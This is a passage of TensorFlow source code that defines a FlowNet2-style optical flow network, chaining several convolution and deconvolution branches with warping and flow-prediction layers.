blobs['conv_redir'] = self.leaky_relu(blobs['conv_redir'], 0.1)
blobs['blob16'] = tf.concat([blobs['conv_redir'], blobs['corr']], axis=3)
blobs['conv3_1'] = tf.nn.conv2d(blobs['blob16'], self.weights['conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv3_1_b']
blobs['conv3_1'] = self.leaky_relu(blobs['conv3_1'], 0.1)
blobs['conv4'] = tf.pad(blobs['conv3_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv4'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv4_b']
blobs['conv4'] = self.leaky_relu(blobs['conv4'], 0.1)
blobs['conv4_1'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv4_1_b']
blobs['conv4_1'] = self.leaky_relu(blobs['conv4_1'], 0.1)
blobs['conv5'] = tf.pad(blobs['conv4_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv5'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv5_b']
blobs['conv5'] = self.leaky_relu(blobs['conv5'], 0.1)
blobs['conv5_1'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv5_1_b']
blobs['conv5_1'] = self.leaky_relu(blobs['conv5_1'], 0.1)
blobs['conv6'] = tf.pad(blobs['conv5_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv6'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv6_b']
blobs['conv6'] = self.leaky_relu(blobs['conv6'], 0.1)
blobs['conv6_1'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv6_1_b']
blobs['conv6_1'] = self.leaky_relu(blobs['conv6_1'], 0.1)
blobs['predict_flow6'] = tf.nn.conv2d(blobs['conv6_1'], self.weights['Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution1_b']
blobs['deconv5'] = tf.nn.conv2d_transpose(blobs['conv6_1'], self.weights['deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['deconv5_b']
blobs['deconv5'] = self.leaky_relu(blobs['deconv5'], 0.1)
blobs['upsampled_flow6_to_5'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['upsample_flow6to5_b']
blobs['concat5'] = tf.concat([blobs['conv5_1'], blobs['deconv5'], blobs['upsampled_flow6_to_5']], axis=3)
blobs['predict_flow5'] = tf.pad(blobs['concat5'], [[0,0], [1,1], [1,1], [0,0]])
blobs['predict_flow5'] = tf.nn.conv2d(blobs['predict_flow5'], self.weights['Convolution2_w'], strides=[1,1,1,1], padding="VALID") + self.weights['Convolution2_b']
blobs['deconv4'] = tf.nn.conv2d_transpose(blobs['concat5'], self.weights['deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['deconv4_b']
blobs['deconv4'] = self.leaky_relu(blobs['deconv4'], 0.1)
blobs['upsampled_flow5_to_4'] = tf.nn.conv2d_transpose(blobs['predict_flow5'], self.weights['upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['upsample_flow5to4_b']
blobs['concat4'] = tf.concat([blobs['conv4_1'], blobs['deconv4'], blobs['upsampled_flow5_to_4']], axis=3)
blobs['predict_flow4'] = tf.nn.conv2d(blobs['concat4'], self.weights['Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution3_b']
blobs['deconv3'] = tf.nn.conv2d_transpose(blobs['concat4'], self.weights['deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['deconv3_b']
blobs['deconv3'] = self.leaky_relu(blobs['deconv3'], 0.1)
blobs['upsampled_flow4_to_3'] = tf.nn.conv2d_transpose(blobs['predict_flow4'], self.weights['upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['upsample_flow4to3_b']
blobs['concat3'] = tf.concat([blobs['conv3_1'], blobs['deconv3'], blobs['upsampled_flow4_to_3']], axis=3)
blobs['predict_flow3'] = tf.nn.conv2d(blobs['concat3'], self.weights['Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution4_b']
blobs['deconv2'] = tf.nn.conv2d_transpose(blobs['concat3'], self.weights['deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['deconv2_b']
blobs['deconv2'] = self.leaky_relu(blobs['deconv2'], 0.1)
blobs['upsampled_flow3_to_2'] = tf.nn.conv2d_transpose(blobs['predict_flow3'], self.weights['upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['upsample_flow3to2_b']
blobs['concat2'] = tf.concat([blobs['conv2a'], blobs['deconv2'], blobs['upsampled_flow3_to_2']], axis=3)
blobs['predict_flow2'] = tf.nn.conv2d(blobs['concat2'], self.weights['Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution5_b']
blobs['blob41'] = blobs['predict_flow2'] * 20.
blobs['blob42'] = tf.image.resize_bilinear(blobs['blob41'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob43'] = self.warp(blobs['img1_nomean_resize'], blobs['blob42'])
blobs['blob44'] = blobs['img0_nomean_resize'] - blobs['blob43']
#blobs['blob45'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob44']**2, axis=3, keep_dims=True))
blobs['blob45'] = self.l2_norm(blobs['blob44'])
blobs['blob46'] = 0.05*blobs['blob42']
blobs['blob47'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob43'], blobs['blob46'], blobs['blob45']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE FIRST BRANCH #####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob48'] = tf.pad(blobs['blob47'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob48'] = tf.nn.conv2d(blobs['blob48'], self.weights['net2_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv1_b']
blobs['blob48'] = self.leaky_relu(blobs['blob48'], 0.1)
blobs['blob49'] = tf.pad(blobs['blob48'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob49'] = tf.nn.conv2d(blobs['blob49'], self.weights['net2_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv2_b']
blobs['blob49'] = self.leaky_relu(blobs['blob49'], 0.1)
blobs['blob50'] = tf.pad(blobs['blob49'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob50'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv3_b']
blobs['blob50'] = self.leaky_relu(blobs['blob50'], 0.1)
blobs['blob51'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv3_1_b']
blobs['blob51'] = self.leaky_relu(blobs['blob51'], 0.1)
blobs['blob52'] = tf.pad(blobs['blob51'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob52'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv4_b']
blobs['blob52'] = self.leaky_relu(blobs['blob52'], 0.1)
blobs['blob53'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv4_1_b']
blobs['blob53'] = self.leaky_relu(blobs['blob53'], 0.1)
blobs['blob54'] = tf.pad(blobs['blob53'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob54'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv5_b']
blobs['blob54'] = self.leaky_relu(blobs['blob54'], 0.1)
blobs['blob55'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv5_1_b']
blobs['blob55'] = self.leaky_relu(blobs['blob55'], 0.1)
blobs['blob56'] = tf.pad(blobs['blob55'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob56'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv6_b']
blobs['blob56'] = self.leaky_relu(blobs['blob56'], 0.1)
blobs['blob57'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv6_1_b']
blobs['blob57'] = self.leaky_relu(blobs['blob57'], 0.1)
blobs['blob58'] = tf.nn.conv2d(blobs['blob57'], self.weights['net2_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv6_b']
blobs['blob59'] = tf.nn.conv2d_transpose(blobs['blob57'], self.weights['net2_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net2_deconv5_b']
blobs['blob59'] = self.leaky_relu(blobs['blob59'], 0.1)
blobs['blob60'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['net2_net2_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow6to5_b']
blobs['blob61'] = tf.concat([blobs['blob55'], blobs['blob59'], blobs['blob60']], axis=3)
blobs['blob62'] = tf.nn.conv2d(blobs['blob61'], self.weights['net2_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv5_b']
blobs['blob63'] = tf.nn.conv2d_transpose(blobs['blob61'], self.weights['net2_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net2_deconv4_b']
blobs['blob63'] = self.leaky_relu(blobs['blob63'], 0.1)
blobs['blob64'] = tf.nn.conv2d_transpose(blobs['blob62'], self.weights['net2_net2_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow5to4_b']
blobs['blob65'] = tf.concat([blobs['blob53'], blobs['blob63'], blobs['blob64']], axis=3)
blobs['blob66'] = tf.nn.conv2d(blobs['blob65'], self.weights['net2_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv4_b']
blobs['blob67'] = tf.nn.conv2d_transpose(blobs['blob65'], self.weights['net2_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net2_deconv3_b']
blobs['blob67'] = self.leaky_relu(blobs['blob67'], 0.1)
blobs['blob68'] = tf.nn.conv2d_transpose(blobs['blob66'], self.weights['net2_net2_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow4to3_b']
blobs['blob69'] = tf.concat([blobs['blob51'], blobs['blob67'], blobs['blob68']], axis=3)
blobs['blob70'] = tf.nn.conv2d(blobs['blob69'], self.weights['net2_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv3_b']
blobs['blob71'] = tf.nn.conv2d_transpose(blobs['blob69'], self.weights['net2_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net2_deconv2_b']
blobs['blob71'] = self.leaky_relu(blobs['blob71'], 0.1)
blobs['blob72'] = tf.nn.conv2d_transpose(blobs['blob70'], self.weights['net2_net2_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow3to2_b']
blobs['blob73'] = tf.concat([blobs['blob49'], blobs['blob71'], blobs['blob72']], axis=3)
blobs['blob74'] = tf.nn.conv2d(blobs['blob73'], self.weights['net2_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv2_b']
blobs['blob75'] = blobs['blob74'] * 20.
blobs['blob76'] = tf.image.resize_bilinear(blobs['blob75'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob77'] = self.warp(blobs['img1_nomean_resize'], blobs['blob76'])
blobs['blob78'] = blobs['img0_nomean_resize'] - blobs['blob77']
#blobs['blob79'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob78']**2, axis=3, keep_dims=True))
blobs['blob79'] = self.l2_norm(blobs['blob78'])
blobs['blob80'] = 0.05*blobs['blob76']
blobs['blob81'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob77'], blobs['blob80'], blobs['blob79']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE SECOND BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob82'] = tf.pad(blobs['blob81'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob82'] = tf.nn.conv2d(blobs['blob82'], self.weights['net3_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv1_b']
blobs['blob82'] = self.leaky_relu(blobs['blob82'], 0.1)
blobs['blob83'] = tf.pad(blobs['blob82'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob83'] = tf.nn.conv2d(blobs['blob83'], self.weights['net3_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv2_b']
blobs['blob83'] = self.leaky_relu(blobs['blob83'], 0.1)
blobs['blob84'] = tf.pad(blobs['blob83'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob84'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv3_b']
blobs['blob84'] = self.leaky_relu(blobs['blob84'], 0.1)
blobs['blob85'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv3_1_b']
blobs['blob85'] = self.leaky_relu(blobs['blob85'], 0.1)
blobs['blob86'] = tf.pad(blobs['blob85'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob86'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv4_b']
blobs['blob86'] = self.leaky_relu(blobs['blob86'], 0.1)
blobs['blob87'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv4_1_b']
blobs['blob87'] = self.leaky_relu(blobs['blob87'], 0.1)
blobs['blob88'] = tf.pad(blobs['blob87'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob88'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv5_b']
blobs['blob88'] = self.leaky_relu(blobs['blob88'], 0.1)
blobs['blob89'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv5_1_b']
blobs['blob89'] = self.leaky_relu(blobs['blob89'], 0.1)
blobs['blob90'] = tf.pad(blobs['blob89'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob90'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv6_b']
blobs['blob90'] = self.leaky_relu(blobs['blob90'], 0.1)
blobs['blob91'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv6_1_b']
blobs['blob91'] = self.leaky_relu(blobs['blob91'], 0.1)
blobs['blob92'] = tf.nn.conv2d(blobs['blob91'], self.weights['net3_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv6_b']
blobs['blob93'] = tf.nn.conv2d_transpose(blobs['blob91'], self.weights['net3_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net3_deconv5_b']
blobs['blob93'] = self.leaky_relu(blobs['blob93'], 0.1)
blobs['blob94'] = tf.nn.conv2d_transpose(blobs['blob92'], self.weights['net3_net3_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow6to5_b']
blobs['blob95'] = tf.concat([blobs['blob89'], blobs['blob93'], blobs['blob94']], axis=3)
blobs['blob96'] = tf.nn.conv2d(blobs['blob95'], self.weights['net3_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv5_b']
blobs['blob97'] = tf.nn.conv2d_transpose(blobs['blob95'], self.weights['net3_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net3_deconv4_b']
blobs['blob97'] = self.leaky_relu(blobs['blob97'], 0.1)
blobs['blob98'] = tf.nn.conv2d_transpose(blobs['blob96'], self.weights['net3_net3_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow5to4_b']
blobs['blob99'] = tf.concat([blobs['blob87'], blobs['blob97'], blobs['blob98']], axis=3)
blobs['blob100'] = tf.nn.conv2d(blobs['blob99'], self.weights['net3_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv4_b']
blobs['blob101'] = tf.nn.conv2d_transpose(blobs['blob99'], self.weights['net3_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net3_deconv3_b']
blobs['blob101'] = self.leaky_relu(blobs['blob101'], 0.1)
blobs['blob102'] = tf.nn.conv2d_transpose(blobs['blob100'], self.weights['net3_net3_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow4to3_b']
blobs['blob103'] = tf.concat([blobs['blob85'], blobs['blob101'], blobs['blob102']], axis=3)
blobs['blob104'] = tf.nn.conv2d(blobs['blob103'], self.weights['net3_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv3_b']
blobs['blob105'] = tf.nn.conv2d_transpose(blobs['blob103'], self.weights['net3_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net3_deconv2_b']
blobs['blob105'] = self.leaky_relu(blobs['blob105'], 0.1)
blobs['blob106'] = tf.nn.conv2d_transpose(blobs['blob104'], self.weights['net3_net3_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow3to2_b']
blobs['blob107'] = tf.concat([blobs['blob83'], blobs['blob105'], blobs['blob106']], axis=3)
blobs['blob108'] = tf.nn.conv2d(blobs['blob107'], self.weights['net3_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv2_b']
blobs['blob109'] = blobs['blob108'] * 20.
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE THIRD BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob110'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize']], axis=3)
#self.run_after(blobs['blob110'], blobs['blob109'])
blobs['blob111'] = tf.nn.conv2d(blobs['blob110'], self.weights['netsd_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv0_b']
blobs['blob111'] = self.leaky_relu(blobs['blob111'], 0.1)
blobs['blob112'] = tf.pad(blobs['blob111'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob112'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv1_b']
blobs['blob112'] = self.leaky_relu(blobs['blob112'], 0.1)
blobs['blob113'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv1_1_b']
blobs['blob113'] = self.leaky_relu(blobs['blob113'], 0.1)
blobs['blob114'] = tf.pad(blobs['blob113'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob114'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv2_b']
blobs['blob114'] = self.leaky_relu(blobs['blob114'], 0.1)
blobs['blob115'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv2_1_b']
blobs['blob115'] = self.leaky_relu(blobs['blob115'], 0.1)
blobs['blob116'] = tf.pad(blobs['blob115'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob116'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv3_b']
blobs['blob116'] = self.leaky_relu(blobs['blob116'], 0.1)
blobs['blob117'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv3_1_b']
blobs['blob117'] = self.leaky_relu(blobs['blob117'], 0.1)
blobs['blob118'] = tf.pad(blobs['blob117'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob118'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv4_b']
blobs['blob118'] = self.leaky_relu(blobs['blob118'], 0.1)
blobs['blob119'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv4_1_b']
blobs['blob119'] = self.leaky_relu(blobs['blob119'], 0.1)
blobs['blob120'] = tf.pad(blobs['blob119'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob120'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv5_b']
blobs['blob120'] = self.leaky_relu(blobs['blob120'], 0.1)
blobs['blob121'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv5_1_b']
blobs['blob121'] = self.leaky_relu(blobs['blob121'], 0.1)
blobs['blob122'] = tf.pad(blobs['blob121'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob122'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv6_b']
blobs['blob122'] = self.leaky_relu(blobs['blob122'], 0.1)
blobs['blob123'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv6_1_b']
blobs['blob123'] = self.leaky_relu(blobs['blob123'], 0.1)
blobs['blob124'] = tf.nn.conv2d(blobs['blob123'], self.weights['netsd_Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution1_b']
blobs['blob125'] = tf.nn.conv2d_transpose(blobs['blob123'], self.weights['netsd_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['netsd_deconv5_b']
blobs['blob125'] = self.leaky_relu(blobs['blob125'], 0.1)
blobs['blob126'] = tf.nn.conv2d_transpose(blobs['blob124'], self.weights['netsd_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow6to5_b']
blobs['blob127'] = tf.concat([blobs['blob121'], blobs['blob125'], blobs['blob126']], axis=3)
blobs['blob128'] = tf.nn.conv2d(blobs['blob127'], self.weights['netsd_interconv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv5_b']
blobs['blob129'] = tf.nn.conv2d(blobs['blob128'], self.weights['netsd_Convolution2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution2_b']
blobs['blob130'] = tf.nn.conv2d_transpose(blobs['blob127'], self.weights['netsd_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['netsd_deconv4_b']
blobs['blob130'] = self.leaky_relu(blobs['blob130'], 0.1)
blobs['blob131'] = tf.nn.conv2d_transpose(blobs['blob129'], self.weights['netsd_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow5to4_b']
blobs['blob132'] = tf.concat([blobs['blob119'], blobs['blob130'], blobs['blob131']], axis=3)
blobs['blob133'] = tf.nn.conv2d(blobs['blob132'], self.weights['netsd_interconv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv4_b']
blobs['blob134'] = tf.nn.conv2d(blobs['blob133'], self.weights['netsd_Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution3_b']
blobs['blob135'] = tf.nn.conv2d_transpose(blobs['blob132'], self.weights['netsd_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['netsd_deconv3_b']
blobs['blob135'] = self.leaky_relu(blobs['blob135'], 0.1)
blobs['blob136'] = tf.nn.conv2d_transpose(blobs['blob134'], self.weights['netsd_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow4to3_b']
blobs['blob137'] = tf.concat([blobs['blob117'], blobs['blob135'], blobs['blob136']], axis=3)
blobs['blob138'] = tf.nn.conv2d(blobs['blob137'], self.weights['netsd_interconv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv3_b']
blobs['blob139'] = tf.nn.conv2d(blobs['blob138'], self.weights['netsd_Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution4_b']
blobs['blob140'] = tf.nn.conv2d_transpose(blobs['blob137'], self.weights['netsd_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['netsd_deconv2_b']
blobs['blob140'] = self.leaky_relu(blobs['blob140'], 0.1)
blobs['blob141'] = tf.nn.conv2d_transpose(blobs['blob139'], self.weights['netsd_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow3to2_b']
blobs['blob142'] = tf.concat([blobs['blob115'], blobs['blob140'], blobs['blob141']], axis=3)
blobs['blob143'] = tf.nn.conv2d(blobs['blob142'], self.weights['netsd_interconv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv2_b']
blobs['blob144'] = tf.nn.conv2d(blobs['blob143'], self.weights['netsd_Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution5_b']
blobs['blob145'] = 0.05*blobs['blob144']
blobs['blob146'] = tf.image.resize_nearest_neighbor(blobs['blob145'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
blobs['blob147'] = tf.image.resize_nearest_neighbor(blobs['blob109'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
#blobs['blob148'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob146']**2, axis=3, keep_dims=True))
blobs['blob148'] = self.l2_norm(blobs['blob146'])
#blobs['blob149'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob147']**2, axis=3, keep_dims=True))
blobs['blob149'] = self.l2_norm(blobs['blob147'])
blobs['blob150'] = self.warp(blobs['img1_nomean_resize'], blobs['blob146'])
blobs['blob151'] = blobs['img0_nomean_resize'] - blobs['blob150']
#blobs['blob152'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob151']**2, axis=3, keep_dims=True))
blobs['blob152'] = self.l2_norm(blobs['blob151'])
